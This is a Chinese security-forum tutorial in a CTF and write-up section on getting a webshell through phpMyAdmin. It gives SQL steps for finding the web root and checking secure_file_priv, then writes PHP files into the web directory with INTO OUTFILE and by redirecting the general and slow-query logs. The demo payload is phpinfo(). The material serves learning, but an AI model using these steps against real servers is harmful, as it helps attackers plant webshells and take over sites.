phpMyadmin/GetShell

sn0w   ·   发表于 2021-01-31 23:13:44   ·   CTF&WP专版

前言

phpMyadmin写shell,之前只是大概了解一些,学习一下。


信息收集

在写shell前,需要先知道网站的真实路径,如果不知道网站真实路径则无法通过URL的方式连shell,所以就要先收集信息
版本信息获取

  1. readme.php
  2. README
  3. changelog.php
  4. Change
  5. Documetation.html
  6. Documetation.txt
  7. translators.html

在phpmyadmin路径后添加以上文件,若管理员没有删除则可以查看到相应的版本信息。
image.png
获取绝对路径

  1. phpinfo()页面
  2. 如果站点是集成的Web框架,可以通过查看数据库路径来猜测Web路径
    1. show variables like '%datadir%';
    2. select @@datadir
    image.png
    如果确定了前两层目录为/var/www/,但最后一层目录不能确定,可以采用目标域名+常用的网站根目录的方式进行爆破
    1. select 'test' into outfile '/var/www/$fuzz$/shell.php'
    如果fuzz的目录存在但没有写进去则显示

    Errcode: 13

如果不存在该目录则会显示

Can’t create/write to file ‘/var/www/html/shell.php (Errcode: 2);

Getshell姿势

0x00:写入文件getshell

使用into outfile 直接在网站目录下写入webshell

前提条件:

  1. 数据库用户有写权限
  2. 知道了web目录的绝对路径
  3. web路径可以写

判断当前数据库用户是否具有写权限

  1. show variables like '%secure%';

image.png
这里需要了解一下secure_file_priv参数的特性及作用:

  • 当secure_file_priv的值为null ,表示限制mysql 不允许导入|导出
  • 当secure_file_priv的值为/tmp/ ,表示限制mysql 的导入|导出只能发生在/tmp/目录下
  • 当secure_file_priv的值没有具体值时,表示不对mysql 的导入|导出做限制

直接写shell文件

  1. select "<?php phpinfo();?>" INTO OUTFILE "C:\\phpstudy\\www\\phpinfo.php"

注意要双反斜线,否则会转义

0x01:日志文件写入webshell

前提条件

  1. 有读写权限
  2. 知道了web绝对路径

利用方法:

  1. 开启日志记录
  2. set global general_log = "ON";
  3. 查看当前的日志目录
  4. show variables like 'general%';
  5. 指定日志文件
  6. set global general_log_file = "C:/phpStudy/WWW/shell.php";
  7. 写入执行代码
  8. select "<?php phpinfo();?>";

image.png

0x02:慢查询写入webshell

  1. 查看当前慢查询日志目录
  2. show variables like '%slow%';
  3. 重新设置路径
  4. set GLOBAL slow_query_log_file='C:/phpStudy/WWW/shell.php';
  5. 开启慢查询日志
  6. set GLOBAL slow_query_log=on;
  7. 执行写入日志
  8. select '<?php phpinfo();?>' from mysql.db where sleep(10);

image.png

参考博客

https://www.cnblogs.com/liliyuanshangcao/p/13815242.html#_label1_2

用户名金币积分时间理由
veek 50.00 0 2021-01-31 23:11:47 期待更多干货~

打赏我,让我更有动力~

1 条回复   |  直到 2021-2-1 | 1098 次浏览

spider
发表于 2021-2-1

nb

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.